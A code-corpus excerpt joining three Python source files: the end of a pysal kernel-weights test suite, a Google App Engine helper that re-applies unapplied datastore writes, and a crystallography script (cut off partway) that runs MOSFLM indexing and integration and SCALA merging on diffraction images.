        self.known_w3_abws = [[11.180341005532938], [11.180341005532938],
                              [20.000002000000002], [11.180341005532938],
                              [14.142137037944515], [18.027758180095585]]
        self.known_wi4 = 0
        self.known_w4 = {0: 0.3989422804014327,
                         1: 0.26741902915776961,
                         3: 0.24197074871621341}
        self.known_w4_abws = self.known_w3_abws
        self.known_wi5 = 1
        self.known_w5 = {4: 0.0070787731484506233,
                         2: 0.2052478782400463,
                         3: 0.23051223027663237,
                         1: 1.0}
        self.known_wi6 = 0
        self.known_w6 = {0: 1.0, 2: 0.03178906767736345,
                         1: 9.9999990066379496e-08}

    ##########################
    #    Classmethod tests   #
    ##########################
    def test_init(self):
        kernel = d.Kernel(self.euclidean_kdt)
        for neighbor, weight in kernel[self.known_wi0].items():
            np.testing.assert_allclose(weight, self.known_w0[neighbor],
                                       rtol=RTOL)

    def test_from_shapefile(self):
        # Named-id variant.
        kernel = d.Kernel.from_shapefile(self.polygon_path,
                                         idVariable='POLYID')
        for neighbor, weight in kernel[self.known_wi5].items():
            np.testing.assert_allclose((neighbor, weight),
                                       (neighbor, self.known_w5[neighbor]),
                                       rtol=RTOL)
        # Adaptive-bandwidth variant.
        kernel = d.Kernel.from_shapefile(self.polygon_path, fixed=False)
        for neighbor, weight in kernel[self.known_wi6].items():
            np.testing.assert_allclose((neighbor, weight),
                                       (neighbor, self.known_w6[neighbor]),
                                       rtol=RTOL)

    def test_from_array(self):
        kernel = d.Kernel.from_array(self.points)
        for neighbor, weight in kernel[self.known_wi0].items():
            np.testing.assert_allclose(weight, self.known_w0[neighbor],
                                       rtol=RTOL)

    @ut.skipIf(PANDAS_EXTINCT, 'Missing pandas')
    def test_from_dataframe(self):
        frame = ps.pdio.read_files(self.polygon_path)
        kernel = d.Kernel.from_dataframe(frame)
        # NOTE(review): indices are shifted by one relative to the POLYID
        # fixture -- presumably 0-based frame ids vs 1-based POLYID; confirm.
        for neighbor, weight in kernel[self.known_wi5 - 1].items():
            np.testing.assert_allclose(weight, self.known_w5[neighbor + 1],
                                       rtol=RTOL)
        shuffled = frame.sample(frac=1)
        kernel = d.Kernel.from_dataframe(shuffled)
        with self.assertRaises(AssertionError):
            assert kernel.id_order == frame.index.tolist()
        self.assertEqual(kernel.id_order, shuffled.index.tolist())

    ##########################
    #   Function/User tests  #
    ##########################
    def test_fixed_bandwidth(self):
        # Scalar bandwidth applied to every observation.
        kernel = d.Kernel(self.points, bandwidth=15.0)
        for neighbor, weight in kernel[self.known_wi1].items():
            np.testing.assert_allclose((neighbor, weight),
                                       (neighbor, self.known_w1[neighbor]))
        np.testing.assert_allclose(np.ones((kernel.n, 1)) * 15,
                                   kernel.bandwidth)
        # Per-observation bandwidth list.
        kernel = d.Kernel(self.points, bandwidth=self.known_w2_bws)
        for neighbor, weight in kernel[self.known_wi2].items():
            np.testing.assert_allclose((neighbor, weight),
                                       (neighbor, self.known_w2[neighbor]),
                                       rtol=RTOL)
        for i in range(kernel.n):
            np.testing.assert_allclose(kernel.bandwidth[i],
                                       self.known_w2_bws[i], rtol=RTOL)

    def test_adaptive_bandwidth(self):
        kernel = d.Kernel(self.points, fixed=False)
        np.testing.assert_allclose(sorted(kernel[self.known_wi3].values()),
                                   sorted(self.known_w3), rtol=RTOL)
        np.testing.assert_allclose(kernel.bandwidth.tolist(),
                                   self.known_w3_abws, rtol=RTOL)
        kernel = d.Kernel(self.points, fixed=False, function='gaussian')
        for neighbor, weight in kernel[self.known_wi4].items():
            np.testing.assert_allclose((neighbor, weight),
                                       (neighbor, self.known_w4[neighbor]),
                                       rtol=RTOL)
        np.testing.assert_allclose(kernel.bandwidth.tolist(),
                                   self.known_w4_abws, rtol=RTOL)
# Assemble one suite covering all distance-weight TestCases; running this
# module directly executes it with the plain-text runner.
_loader = ut.TestLoader()
knn = _loader.loadTestsFromTestCase(Test_KNN)
kern = _loader.loadTestsFromTestCase(Test_Kernel)
db = _loader.loadTestsFromTestCase(Test_DistanceBand)
suite = ut.TestSuite([knn, kern, db])
if __name__ == '__main__':
    ut.TextTestRunner().run(suite)
|
ljwolf/pysal
|
pysal/weights/tests/test_Distance.py
|
Python
|
bsd-3-clause
| 11,865
|
[
"COLUMBUS",
"Gaussian"
] |
ac71b1d5920237fcd764ac724ef42e390a75e8ab6d5af1ea1b7ec17668c18892
|
#!/usr/bin/env python
# Copyright (C) 2010-2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Methods to fix unapplied writes.
Unapplied writes are stored in the datastore as entities where the
child node of the entity key has kind __unapplied_write__OriginalKind.
This module contains methods for applying those writes.
Currently it contains methods which work at the datastore low level API.
Sample usage using remote_api:
* Enable remote_api for your application
(see https://developers.google.com/appengine/articles/remote_api)
* Change to a directory where this module exists.
* Run remote_api_shell.py -s apply-writes.your-app-id.appspot.com
* In the remote_api_shell, run the following:
import apply_unapplied_writes
apply_unapplied_writes.apply_entity_by_name(YOURKIND, A KEY NAME OR ID)
Sample usage using the map reduce framework:
* Install the map reduce framework in your app.
(see http://code.google.com/p/appengine-mapreduce/)
* Add this module to your app.
* Add the following to the mapreduce.yaml file:
mapreduce:
- name: "Apply Unapplied Entity Writes"
mapper:
input_reader: mapreduce.input_readers.DatastoreInputReader
handler: apply_unapplied_writes.apply_model_instance
params:
- name: entity_kind
default: models.__unapplied_write__MyModel
* Visit https://apply-writes-dot-your-app-id.appspot.com/mapreduce/
* Select 'Apply Unapplied Entity Writes' from the dropdown.
* Enter the kind you wish to apply.
* Click Launch Job.
"""
import logging
from google.appengine.api import datastore
# Key-path kind prefix that marks a datastore entity as an unapplied write
# (the child node's kind is __unapplied_write__OriginalKind).
UNAPPLIED_WRITE_KIND_PREFIX = '__unapplied_write__'
# Cached prefix length, used to strip the prefix and recover the original kind.
UNAPPLIED_WRITE_KIND_PREFIX_LEN = len(UNAPPLIED_WRITE_KIND_PREFIX)
def apply_entity(unapplied_entity, delete_unapplied_entity=True):
  """Re-write an entity representing an unapplied write to apply it.

  Args:
    unapplied_entity: An app engine datastore entity, typically loaded by
      datastore.Get. This will not work for a model instance, e.g. one
      loaded from db.get.
    delete_unapplied_entity: If true, the record of the unapplied write will
      be removed from the datastore.
  """
  key = unapplied_entity.key()
  path = unapplied_entity.key().to_path()
  # The child node of the key has kind __unapplied_write__OriginalKind.
  kind = path[-2]
  if not kind.startswith(UNAPPLIED_WRITE_KIND_PREFIX):
    # Bug fix: the logging module has no Error() function, so the original
    # logging.Error call raised AttributeError instead of logging.
    logging.error("Attempting to apply an already applied write: %r", key)
    return
  kind = kind[UNAPPLIED_WRITE_KIND_PREFIX_LEN:]
  id_or_name = path[-1]
  namespace = unapplied_entity.namespace()
  # You can insert code here to change id_or_name.
  if isinstance(id_or_name, basestring):  # Python 2 runtime (App Engine).
    entity_to_apply = datastore.Entity(kind, key.parent(), name=id_or_name,
                                       namespace=namespace)
  elif id_or_name:
    entity_to_apply = datastore.Entity(kind, key.parent(), id=id_or_name,
                                       namespace=namespace)
  else:
    # Neither a string name nor a numeric id: let the datastore assign one.
    entity_to_apply = datastore.Entity(kind, key.parent(),
                                       namespace=namespace)
  entity_to_apply.update(unapplied_entity)
  # You can insert code here to change entity_to_apply.
  datastore.Put(entity_to_apply)
  if delete_unapplied_entity:
    datastore.Delete(unapplied_entity)
def apply_entity_by_name(kind, id_or_name, parent=None,
                         delete_unapplied_entity=True):
  """Apply an unapplied write for a given kind and id or name.

  Loads the unapplied-write record for the identified entity and applies it.

  Args:
    kind: The kind of the entity to apply.
    id_or_name: The numeric ID or string name of the entity to find and apply.
    parent: Parent key for the entity to apply, or None for a root entity.
    delete_unapplied_entity: If true, the record of the unapplied write will
      be removed from the datastore.
  """
  # Build the key path: optional ancestor path, then the prefixed child node.
  path = parent.to_path() if parent else []
  path.extend([UNAPPLIED_WRITE_KIND_PREFIX + kind, id_or_name])
  unapplied_entity = datastore.Get(datastore.Key.from_path(*path))
  apply_entity(unapplied_entity, delete_unapplied_entity)
def apply_model_instance(model_instance, delete_unapplied_entity=True):
  """Apply an unapplied write from a model instance.

  Wrapper around apply_entity, suitable for use with the App Engine mapper
  framework.

  Args:
    model_instance: Typically the result of a db.get or db.Query.get.
    delete_unapplied_entity: If true, the record of the unapplied write will
      be removed from the datastore.
  """
  # Convert the model instance back into a low-level datastore entity,
  # which is what apply_entity expects.
  apply_entity(model_instance._populate_entity(), delete_unapplied_entity)
|
googlearchive/appengine-recover-unapplied-writes-python
|
apply_unapplied_writes.py
|
Python
|
apache-2.0
| 5,104
|
[
"VisIt"
] |
462331a0263a4c2ce177ad666672abd085428fb39a4dc48b943fe9591a919091
|
#################################################################
# #
# Integrate images with MOSFLM and merge with SCALA #
# #
# Copyright: Molecular Images 2007 #
# #
# This script is distributed under the same conditions as MIFit #
# #
#################################################################
import sys
import os
import getopt
import time
import string
import dircache
import ccp4check
def Usage():
    """Print command-line usage for the MOSFLM integrate / SCALA merge driver.

    NOTE: this script targets a Python 2 runtime (print statements, the
    dircache module) and will not run under Python 3 as written.
    """
    print "Usage: %s [options]" % sys.argv[0]
    print "Options are:"
    print " -t,--template_image=FILE: name of template image file"
    print " -s,--spacegroup=NUM the space group number"
    print " -f,--first_image=NUM first image number to process, has default"
    print " -l,--last_image=NUM last image number to process, has default"
    print " -i,--integrate_resolution=STRING integrate resolution, if any"
    print " -g,--batch_prefix=NUM group number, prefix for batch. default: 1"
    print " -o,--index_only=no or yes only test index the images. default: no"
    print " -w,--workdir=DIR the working directory. default: image directory"
    print " -d,--detector_constants=FILE file for detector constants: default: none"
    print " -?,--help this help message"
def Run(argv=None):
if argv is None:
argv=sys.argv
# Initialize
first_image = 'none'
last_image = 'none'
dt_spacegroup = 'none'
image_name = 'none'
final_workdir = 'none'
integrate_res = 'none'
merging_res = 'none'
index_only = 'no'
integrate_res = 'none'
batch_prefix = 'none'
detector_constants = 'none'
beam_x_image = 'none'
beam_y_image = 'none'
image_extension = 4
gain = '1.0'
quote = '''"'''
##################
# Parse args #
##################
args = argv[1:]
optlist, args = getopt.getopt(
args,'t:s:w:f:l:i:m:g:o:d:?',
['template_image=','spacegroup=','first_image=',
'last_image=','integrate_resolution=','merge_resolution=',
'batch_prefix=','index_only=','workdir=','detector_constants=',
'help'])
number_of_inputs = len(optlist)
if number_of_inputs==0:
Usage()
return
count = 0
while count < number_of_inputs:
aList = optlist[count]
number_of_list_inputs = len(aList)
if number_of_list_inputs >=1:
arg_value = aList[0]
if arg_value=='-?' or arg_value=='--help':
Usage()
return
if number_of_list_inputs >=2:
param_value = aList[1]
if arg_value == '-t' or arg_value=='--template_image':
image_name = param_value
elif arg_value == '-s' or arg_value=='--spacegroup':
dt_spacegroup = param_value
elif arg_value == '-f' or arg_value=='--first_image':
first_image = param_value
elif arg_value == '-l' or arg_value=='--last_image':
last_image = param_value
elif arg_value == '-i' or arg_value=='--integrate_resolution':
integrate_res = param_value
elif arg_value == '-g' or arg_value=='--batch_prefix':
batch_prefix = param_value
elif arg_value == '-o' or arg_value=='--index_only':
index_only = param_value
elif arg_value == '-w' or arg_value=='--workdir':
final_workdir = param_value
elif arg_value == '-d' or arg_value=='--detector_constants':
detector_constants = param_value
count = count + 1
#######################
# Checks and defaults #
#######################
ccp4,error = ccp4check.ccp4check()
if not ccp4:
print '\n' + error + '\n'
time.sleep(4)
return 1
ipmosflm_path = 'ipmosflm'
# Check for image directory
fileexists = os.path.exists(image_name)
if fileexists == 0:
print 'The template image was not found:',image_name
time.sleep(4)
return 1
# Check for processed file directory
filexists = os.path.exists(final_workdir)
if fileexists == 0 and final_workdir != 'none':
print 'The final directory for processed data was not found:',final_workdir
time.sleep(4)
return 1
# Check for space group
if dt_spacegroup == 'none':
print 'The space group number was not given'
time.sleep(4)
return 1
# Set data run identification
if batch_prefix == 'none':
data_code_number = '1'
else:
data_code_number = batch_prefix
####################################################
# Establish image template from example image file #
####################################################
image_dir = os.path.dirname(image_name)
image_name = os.path.basename(image_name)
# Check that image files have extension .img or .osc preceeded by a 3 or 4 digit number
if image_name.find('.img') > -1 or image_name.find('.osc') > -1:
image_name_split = image_name.split('.')
image_name_root = image_name_split[0]
i_end = len(image_name_root)
i_start = i_end - 4
image_number = image_name_root[i_start:i_end]
if image_number.isdigit() == 1:
image_number = int(image_number)
image_extension = 4
else:
i_start = i_end - 3
image_number = image_name_root[i_start:i_end]
image_extension = 3
if image_number.isdigit() == 1:
image_number = int(image_number)
else:
print '\nImage file names must contain 3 or 4 digits preceeding extension .osc/.img\n'
time.sleep(4)
return 1
# Establish MOSFLM template file name
num = len(image_name)
if image_extension == 3:
num = num - 7
hashes = '###'
elif image_extension == 4:
num = num - 8
hashes = '####'
image_name_nodigits = image_name[0:num]
if image_name.find('.img') > -1:
mosflm_template = image_name_nodigits + hashes + '.img'
elif image_name.find('.osc') > -1:
mosflm_template = image_name_nodigits + hashes + '.osc'
filename_spt = image_name[0:num-1] + '.spt'
else:
print '\nImage file names must contain 3 or 4 digits preceeding extension .osc/.img\n'
time.sleep(4)
return 1
#############################################
# Check image folder to find image ranges #
#############################################
image_number_low = 9999
image_number_high = -9999
aList_dir = dircache.listdir(image_dir)
number_files = len(aList_dir)
count = 0
while count < number_files:
imagefile = aList_dir[count]
imagefile = os.path.basename(imagefile)
if imagefile.find('.img') > -1 or imagefile.find('.osc') > -1:
if imagefile.find(image_name_nodigits) > -1:
imagefilename_length = len(imagefile)
if image_extension == 3:
i1 = imagefilename_length - 7
i2 = imagefilename_length - 4
elif image_extension == 4:
i1 = imagefilename_length - 8
i2 = imagefilename_length - 4
image_number = imagefile[i1:i2]
if image_number.isdigit() == 1:
image_number = int(image_number)
if image_number < image_number_low:
image_number_low = image_number
if image_number > image_number_high:
image_number_high = image_number
count = count + 1
# Checks
if image_number_low == 9999:
print '\nFirst image number was not determined\n'
time.sleep(4)
return 1
if image_number_high == -9999:
print '\nLast image number was not determined\n'
time.sleep(4)
return 1
# Set image numbers to integrate per user specification else use all images from directory analysis
if first_image != 'none':
image_number_low = int(first_image)
else:
first_image = str(image_number_low)
if last_image != 'none':
image_number_high = int(last_image)
else:
last_image = str(image_number_high)
#############################
# Setup program parameters #
#############################
# Total number of images
number_images = image_number_high - image_number_low + 1
if number_images < 10:
print '\nImages in this data set only', str(image_number_low), ' to ', str(image_number_high),' so not processing\n'
time.sleep(4)
return 1
# Starting indexing and refinement images
index_first = image_number_low
refine_segment1_first = image_number_low
refine_segment1_last = image_number_low + 3
cell_refine_images_segment1 = str(refine_segment1_first) + ' to ' + str(refine_segment1_last)
# Orthogonal images for refinement
second_index = 90
if number_images > second_index:
index_second = image_number_low + second_index - 1
refine_segment2_last = image_number_low + second_index -1
else:
index_second = image_number_high
refine_segment2_last = image_number_high
refine_segment2_first = refine_segment2_last - 3
cell_refine_images_segment2 = str(refine_segment2_first) + ' to ' + str(refine_segment2_last)
# Intermediate images for refinement
refine_segment12_first = (refine_segment1_first + refine_segment2_first)/2
refine_segment12_first = int(refine_segment12_first)
refine_segment12_last = refine_segment12_first + 3
cell_refine_images_segment12 = str(refine_segment12_first) + ' to ' + str(refine_segment12_last)
# Orthogonal images ranges for initial index and for possible reindexing pass
image_seq_find = str(index_first) + ' ' + str(index_second)
image_seq_reindex = str(index_first) + ' ' + str(refine_segment12_first) + ' ' + str(index_second)
# Collect user-defined beamcenter or distance data from a special constants file
beam_x = 'none'
beam_y = 'none'
xtal_detector_distance = 'none'
fileexists = os.path.exists(detector_constants)
if fileexists != 0 and detector_constants != 'none':
file = open(detector_constants,'r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('beam_center') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args > 2:
beam_x = aLine[1]
beam_y = aLine[2]
else:
print 'There should be two numbers on the beam_center line'
time.sleep(4)
return 1
if eachLine.find('xtal_detector_distance') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args > 1:
xtal_detector_distance = aLine[1]
else:
print 'There should be one number on the xtal_detector_distance line'
time.sleep(4)
return 1
if eachLine.find('detector_gain') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args > 1:
detector_gain = aLine[1]
else:
print 'There should be one number on the detector_gain line'
time.sleep(4)
return 1
##########
# Start #
##########
print '\nAutomated integration and merging\n'
print 'Image directory:',image_dir
print 'Template image:',mosflm_template
print 'Batch number:',batch_prefix
print 'First image to process:',first_image
print 'Last image to process:',last_image
print 'Images for initial indexing:',image_seq_find
print 'Integration resolution limits:',integrate_res
if integrate_res == 'none':
print ' It may be better to specify the resolution limits'
print 'Expected space group number:',dt_spacegroup
if beam_x != 'none':
print 'Using input beam center:',beam_x,beam_y
if xtal_detector_distance != 'none':
print 'Using input detector distance:',xtal_detector_distance
# Go to image directory
os.chdir(image_dir)
# Process log
runtime = time.ctime(time.time())
file = open('autoprocess.log','w')
file.write('Processing start time : ')
file.write(runtime)
file.write('\n')
file.close()
# Eliminate debris from previous runs
fileexists = os.path.exists('COORDS')
if fileexists != 0:
os.remove('COORDS')
fileexists = os.path.exists('SUMMARY')
if fileexists != 0:
os.remove('SUMMARY')
fileexists = os.path.exists('NEWMAT')
if fileexists != 0:
os.remove('NEWMAT')
fileexists = os.path.exists('NEWMAT_REFINED')
if fileexists != 0:
os.remove('NEWMAT_REFINED')
###############
# Check index #
###############
if index_only == 'yes':
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Indexing test'
file = open('mi_mosflm_index_check.inp','w')
file.write('TITLE Indexing check in P1\n')
file.write('TEMPLATE ')
file.write(mosflm_template)
file.write('\n')
file.write('DIRECTORY "')
file.write(image_dir)
file.write('"\n')
# Apply user specified beam center if given
if beam_x != 'none':
file.write('BEAM ')
file.write(beam_x)
file.write(' ')
file.write(beam_y)
file.write('\n')
# Apply user specified distance if given
if xtal_detector_distance != 'none':
file.write('DISTANCE ')
file.write(xtal_detector_distance)
file.write('\n')
# Symmetry and indexing
file.write('SYMM 1\n')
file.write('SEPARATION CLOSE\n')
file.write('FINDSPOTS THRESHOLD 10\n')
file.write('AUTOINDEX DPS IMAGES ')
file.write(image_seq_find)
file.write('\n')
file.write('GO\n')
file.close()
# Execute
runmosflm = ipmosflm_path + ' < mi_mosflm_index_check.inp > mi_mosflm_index_check.log'
os.system(runmosflm)
fileexists = os.path.exists('NEWMAT')
if fileexists != 0:
os.remove('mi_mosflm_index_check.inp')
else:
print 'MOSFLM Indexing check seems to have failed'
time.sleep(4)
return 1
fileexists = os.path.exists('COORDS')
if fileexists != 0:
os.remove('COORDS')
fileexists = os.path.exists('SUMMARY')
if fileexists != 0:
os.remove('SUMMARY')
fileexists = os.path.exists('NEWMAT')
if fileexists != 0:
os.remove('NEWMAT')
print 'Testing indexing only. See file: mi_mosflm_index_check.log'
time.sleep(4)
return 1
###############
# Auto index #
###############
indexed = 'yes'
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Autoindexing'
file = open('mi_mosflm_index.inp','w')
file.write('TITLE Autoindexing\n')
file.write('TEMPLATE ')
file.write(mosflm_template)
file.write('\n')
file.write('DIRECTORY "')
file.write(image_dir)
file.write('"\n')
# Apply user specified beam center if given
if beam_x != 'none':
file.write('BEAM ')
file.write(beam_x)
file.write(' ')
file.write(beam_y)
file.write('\n')
# Apply user specified distance if given
if xtal_detector_distance != 'none':
file.write('DISTANCE ')
file.write(xtal_detector_distance)
file.write('\n')
# Symmetry and indexing
file.write('SYMM ')
file.write(dt_spacegroup)
file.write('\n')
file.write('SEPARATION CLOSE\n')
file.write('FINDSPOTS THRESHOLD 10\n')
file.write('AUTOINDEX DPS IMAGES ')
file.write(image_seq_find)
file.write('\n')
file.write('GO\n')
file.close()
# Execute
runmosflm = ipmosflm_path + ' < mi_mosflm_index.inp > mi_mosflm_index.log'
os.system(runmosflm)
fileexists = os.path.exists('NEWMAT')
if fileexists != 0:
os.remove('mi_mosflm_index.inp')
runtime = time.ctime(time.time())
file = open('autoprocess.log','a')
file.write('Autoindexing done : ')
file.write(runtime)
file.write('\n')
file.close()
# Obtain beam center
file = open('mi_mosflm_index.log')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('Beam coordinates of') > -1 and eachLine.find('have been refined') > -1:
aLine = eachLine.split()
beam_x_image = aLine[9]
beam_y_image = aLine[10]
if eachLine.find('***** WARNING ***** WARNING ***** WARNING') > -1:
indexed = 'no'
if beam_x_image == 'none' or beam_y_image == 'none':
print 'Parsing of beam center seems to have failed'
time.sleep(4)
return 1
else:
print 'MOSFLM Autoindexing seems to have failed'
time.sleep(4)
return 1
fileexists = os.path.exists('COORDS')
if fileexists != 0:
os.remove('COORDS')
fileexists = os.path.exists('SUMMARY')
if fileexists != 0:
os.remove('SUMMARY')
if indexed == 'no':
print 'There appears to be a problem with the direct beam position - stopping'
time.sleep(4)
return 1
#####################
# Cell Refinement #
#####################
refined = 'yes'
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Cell refinement'
file = open('mi_mosflm_refine.inp','w')
file.write('TITLE Cell refinement\n')
file.write('TEMPLATE ')
file.write(mosflm_template)
file.write('\n')
file.write('DIRECTORY "')
file.write(image_dir)
file.write('"\n')
file.write('MATRIX NEWMAT\n')
# Use beam center from indexing
file.write('BEAM ')
file.write(beam_x_image)
file.write(' ')
file.write(beam_y_image)
file.write('\n')
file.write('BACKSTOP CENTRE ')
file.write(beam_x_image)
file.write(' ')
file.write(beam_y_image)
file.write(' RADIUS 5.00\n')
# Apply user specified distance if given
if xtal_detector_distance != 'none':
file.write('DISTANCE ')
file.write(xtal_detector_distance)
file.write('\n')
file.write('SYMM ')
file.write(dt_spacegroup)
file.write('\n')
# Machine and crystal default
file.write('MOSAIC 0.70\n')
file.write('SEPARATION CLOSE\n')
file.write('GAIN ')
file.write(gain)
file.write('\n')
file.write('OVERLOAD CUTOFF 65500\n')
file.write('DISTORTION YSCALE 1.0000 TILT 0 TWIST 0\n')
if integrate_res != 'none':
file.write('RESOLUTION ')
file.write(integrate_res)
file.write('\n')
# Refinement
file.write('NEWMATRIX NEWMAT_REFINED\n')
file.write('POSTREF SEGMENT 3 MAXRESIDUAL 1.3 SHIFTFAC 3.0 MAXSHIFT 0.1 RESOLUTION 4.0\n')
file.write('PROCESS ')
file.write(cell_refine_images_segment1)
file.write('\nGO\n')
file.write('PROCESS ')
file.write(cell_refine_images_segment12)
file.write('\nGO\n')
file.write('PROCESS ')
file.write(cell_refine_images_segment2)
file.write('\nGO\n')
file.close()
# Execute
runmosflm = ipmosflm_path + ' < mi_mosflm_refine.inp > mi_mosflm_refine.log'
os.system(runmosflm)
fileexists = os.path.exists('NEWMAT_REFINED')
if fileexists != 0:
os.remove('mi_mosflm_refine.inp')
runtime = time.ctime(time.time())
file = open('autoprocess.log','a')
file.write('Cell refinement done : ')
file.write(runtime)
file.write('\n')
file.close()
# Check cell refinement
file = open('mi_mosflm_refine.log')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('INACCURATE CELL PARAMETERS') > -1:
refined = 'no'
else:
print 'MOSFLM cell refinement seems to have failed'
time.sleep(4)
return 1
fileexists = os.path.exists('SUMMARY')
if fileexists != 0:
os.remove('SUMMARY')
fileexists = os.path.exists('GENFILE')
if fileexists != 0:
os.remove('GENFILE')
fileexists = os.path.exists('NEWMAT')
if fileexists != 0:
os.remove('NEWMAT')
if refined == 'no':
print 'Cell parameters unreliable so trying indexing strategy'
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Cell estimation'
# Try rescue strategy with indexing
fileexists = os.path.exists('NEWMAT_REFINED')
if fileexists != 0:
os.remove('NEWMAT_REFINED')
file = open('mi_mosflm_reindex.inp','w')
file.write('TITLE Reindexing\n')
file.write('TEMPLATE ')
file.write(mosflm_template)
file.write('\n')
file.write('DIRECTORY "')
file.write(image_dir)
file.write('"\n')
file.write('BEAM ')
file.write(beam_x_image)
file.write(' ')
file.write(beam_y_image)
file.write('\n')
if xtal_detector_distance != 'none':
file.write('DISTANCE ')
file.write(xtal_detector_distance)
file.write('\n')
file.write('SYMM ')
file.write(dt_spacegroup)
file.write('\n')
file.write('SEPARATION CLOSE\n')
file.write('FINDSPOTS THRESHOLD 10\n')
file.write('AUTOINDEX DPS IMAGES ')
file.write(image_seq_reindex)
file.write('\n')
file.write('GO\n')
file.close()
# Execute
runmosflm = ipmosflm_path + ' < mi_mosflm_reindex.inp > mi_mosflm_reindex.log'
os.system(runmosflm)
runtime = time.ctime(time.time())
file = open('autoprocess.log','a')
file.write('Cell reestimation done : ')
file.write(runtime)
file.write('\n')
file.close()
fileexists = os.path.exists('COORDS')
if fileexists != 0:
os.remove('COORDS')
fileexists = os.path.exists('SUMMARY')
if fileexists != 0:
os.remove('SUMMARY')
fileexists = os.path.exists('mi_mosflm_reindex.inp')
if fileexists != 0:
os.remove('mi_mosflm_reindex.inp')
os.rename('NEWMAT','NEWMAT_REFINED')
###########################
# Integrate #
###########################
fileexists = os.path.exists('mi_integrate.mtz')
if fileexists != 0:
os.remove('mi_integrate.mtz')
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Image integration'
output_integrate_log = 'mi_mosflm_integrate_' + data_code_number + '.log'
file = open('mi_mosflm_integrate.inp','w')
file.write('TITLE Cell refinement\n')
file.write('TEMPLATE ')
file.write(mosflm_template)
file.write('\n')
file.write('DIRECTORY "')
file.write(image_dir)
file.write('"\n')
file.write('MATRIX NEWMAT_REFINED\n')
file.write('GENFILE GENFILE\n')
file.write('HKLOUT mi_integration.mtz\n')
file.write('BEAM ')
file.write(beam_x_image)
file.write(' ')
file.write(beam_y_image)
file.write('\n')
file.write('BACKSTOP CENTRE ')
file.write(beam_x_image)
file.write(' ')
file.write(beam_y_image)
file.write(' RADIUS 5.00\n')
# Apply user specified distance if given
if xtal_detector_distance != 'none':
file.write('DISTANCE ')
file.write(xtal_detector_distance)
file.write('\n')
file.write('SYMM ')
file.write(dt_spacegroup)
file.write('\n')
# Machine and crystal default
file.write('MOSAIC 0.70\n')
file.write('GAIN ')
file.write(gain)
file.write('\n')
file.write('OVERLOAD CUTOFF 65500\n')
file.write('DISTORTION YSCALE 1.0000 TILT 0 TWIST 0\n')
# Refinement
if integrate_res != 'none':
file.write('RESOLUTION ')
file.write(integrate_res)
file.write('\n')
file.write('POSTREF FIX ALL\n')
file.write('PROCESS ')
file.write(first_image)
file.write(' TO ')
file.write(last_image)
file.write('\nGO\n')
file.close()
# Execute
runmosflm = ipmosflm_path + ' < mi_mosflm_integrate.inp > ' + output_integrate_log
os.system(runmosflm)
fileexists = os.path.exists('mi_integration.mtz')
if fileexists != 0:
os.remove('mi_mosflm_integrate.inp')
else:
print 'MOSFLM integration seems to have failed'
time.sleep(4)
return 1
fileexists = os.path.exists('SUMMARY')
if fileexists != 0:
os.remove('SUMMARY')
fileexists = os.path.exists('GENFILE.gen')
if fileexists != 0:
os.remove('GENFILE.gen')
fileexists = os.path.exists('NEWMAT_REFINED')
if fileexists != 0:
os.remove('NEWMAT_REFINED')
fileexists = os.path.exists(filename_spt)
if fileexists != 0:
os.remove(filename_spt)
#################################
# Need to sort prior to merging #
#################################
fileexists = os.path.exists('mi_integration_sorted.mtz')
if fileexists != 0:
os.remove('mi_integration_sorted.mtz')
file = open('mi_sortmtz.inp','w')
file.write('H K L M/ISYM BATCH\n')
file.close()
run_sortmtz = 'sortmtz HKLIN mi_integration.mtz HKLOUT mi_integration_sorted.mtz < mi_sortmtz.inp > mi_sortmtz.log'
os.system(run_sortmtz)
fileexists = os.path.exists('mi_integration_sorted.mtz')
if fileexists == 0:
print 'Sorting process failed'
time.sleep(4)
return 1
else:
os.remove('mi_integration.mtz')
os.rename('mi_integration_sorted.mtz','mi_integration.mtz')
os.remove('mi_sortmtz.inp')
os.remove('mi_sortmtz.log')
# Check
fileexists = os.path.exists('mi_integration.mtz')
if fileexists == 0:
print 'File mi_integration.mtz is not available for merging'
time.sleep(4)
return 1
else:
runtime = time.ctime(time.time())
file = open('autoprocess.log','a')
file.write('Integration done : ')
file.write(runtime)
file.write('\n')
file.close()
#########################################################
# Automatic assessment of resolution limit if not given #
#########################################################
if integrate_res == 'none':
ioversigi_limit = 2.0
runtime = time.ctime(time.time())
print 'Date:',runtime
print 'Merging test'
output_ref_initial = 'ScalAverage_' + data_code_number + '_initial.mtz'
output_log_initial = 'scala_scaleaverage_' + data_code_number + '_initial.log'
file = open('mi_scala.inp','w')
file.write('TITLE First pass merging\n')
file.write('RUN 1 ALL\n')
file.write('INTENSITIES PARTIAL\n')
file.write('CYCLES 20\n')
file.write('ANOMALOUS OFF\n')
file.write('SDCORRECTION 1.3 0.02\n')
file.write('SCALES ROTATION SPACING 5 SECONDARY 6 TAILS BFACTOR ON BROTATION SPACING 20\n')
file.write('TIE BFACTOR 0.5\n')
file.write('REJECT 6 6 ALL -8 -8\n')
file.write('EXCLUDE EMAX 10\n')
file.write('BINS 20\n')
file.close()
run_scala = 'scala HKLIN mi_integration.mtz HKLOUT ' + output_ref_initial +\
' SCALES mi_scales.txt ROGUES mi_rogues.txt NORMPLOT mi_normplot.txt PLOT mi_plot.txt < mi_scala.inp > ' \
+ output_log_initial
os.system(run_scala)
fileexists = os.path.exists(output_ref_initial)
if fileexists == 0:
print 'Process SCALA seems to have failed'
time.sleep(4)
return 1
else:
os.remove('mi_scala.inp')
runtime = time.ctime(time.time())
file = open('autoprocess.log','a')
file.write('Merging check done : ')
file.write(runtime)
